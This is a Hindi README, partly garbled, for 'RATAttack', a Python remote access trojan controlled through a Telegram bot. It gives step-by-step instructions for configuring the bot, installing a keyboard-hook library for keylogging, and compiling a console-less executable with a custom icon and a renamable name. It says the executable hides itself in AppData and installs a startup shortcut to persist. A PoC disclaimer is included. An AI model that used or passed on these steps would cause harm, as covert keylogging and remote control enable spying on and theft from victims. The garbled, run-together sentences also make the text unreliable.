
टेलीग्राम के माध्यम से विंडोज़ रिमोट पोस्ट-ब्रिच टूल
टेलीग्राम के माध्यम से विंडोज़ रिमोट पोस्ट ब्रीच टूल (पायथन 2.7), मूल रूप से Ritiek द्वारा बनाया गया, mvrozanti द्वारा फोर्क और संशोधित किया गया और फिर मेरे द्वारा।
इस टूल का पूरा उद्देश्य टेलीग्राम के माध्यम से पहले से ही समझौता की गई मशीन के नियंत्रण को (एक "PoC" के रूप में) प्रदर्शित करना है। जैसा कि मेरे पहले से लिखे गए टूल के साथ है, मैं अवैध गतिविधियों को बढ़ावा नहीं देता।
यह संशोधित संस्करण पारंपरिक v1 के बजाय टेलीग्राम बॉट API v2 का उपयोग करता है। मुख्य परिवर्तन टेक्स्ट टाइपिंग के बजाय कीबोर्ड बटन है। "mvrozanti" से आवश्यक परिवर्तन जोड़ने के बाद, मैं नई सुविधाएँ जोड़ने, बग बंद करने और API v3 के साथ संगत होने का प्रयास करूँगा। इस बीच, cd, download, upload, run और delete कमांड काम नहीं करेंगे।

file के रूप में टेलीग्राम बॉट को भेजेंबाजार में मौजूद वर्तमान रिमोट एडमिनिस्ट्रेशन टूल 2 प्रमुख समस्याओं का सामना करते हैं:
यह RAT टेलीग्राम बॉट API का उपयोग करके इन दोनों समस्याओं को दूर करता है।
BotFather से बात करके एक नया टेलीग्राम बॉट सेट अप करें।pip install -r requirements.txt।64-bit या 32-bit इंस्टॉल करें।
pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl।pip install pyHook-1.5.1-cp27-cp27m-win32.whl।python RATAttack.py।chat_id नोट करें और इसे स्क्रिप्ट में बदलें और return True लाइन को कमेंट कर दें। चिंता न करें, जब आप स्क्रिप्ट में कमेंट पढ़ेंगे तो आपको पता चल जाएगा।
RATAttack नामक एक फ़ोल्डर बनाया जाएगा जिसमें और बॉट पर अपलोड की गई कोई भी फ़ाइलें होंगी।compileAndRun.bat में अपना पथ बदलें (इसे चलाने से वास्तव में एक्ज़ीक्यूटेबल चलेगा)
`pyinstaller --onefile --noconsole C:\path\to\RATAttack.py` चलाएँ। आप किसी भी कस्टम आइकन का उपयोग करने के लिए `--icon=<path\to\icon.ico>` भी पास कर सकते हैं।
C:\Python27\Scripts\dist\ में .exe फ़ाइल ढूंढें। आप .exe का नाम अपनी इच्छानुसार कुछ भी बदल सकते हैं।.exe को चलाते हैं, तो स्क्रिप्ट स्वयं को छिपा लेगी और स्टार्टअप पर चलने के लिए आपके PC को संक्रमित कर देगी। आप /self_destruct विकल्प का उपयोग करके या C:\Users\Username\AppData\Roaming\Portal निर्देशिका और C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk को मैन्युअल रूप से हटाकर सामान्य स्थिति में लौट सकते हैं (हालाँकि मैं फिलहाल उन्हें मैन्युअल रूप से हटाने की सलाह देता हूँ)।.exe फ़ाइल का नाम और उस फ़ोल्डर का स्थान और नाम भी संशोधित कर सकते हैं जहां छिपा हुआ .exe स्वयं को छिपाएगा। ऐसा करने के लिए; क्रमशः compiled_name और hide_folder संशोधित करें।The MIT License
keylogs.txt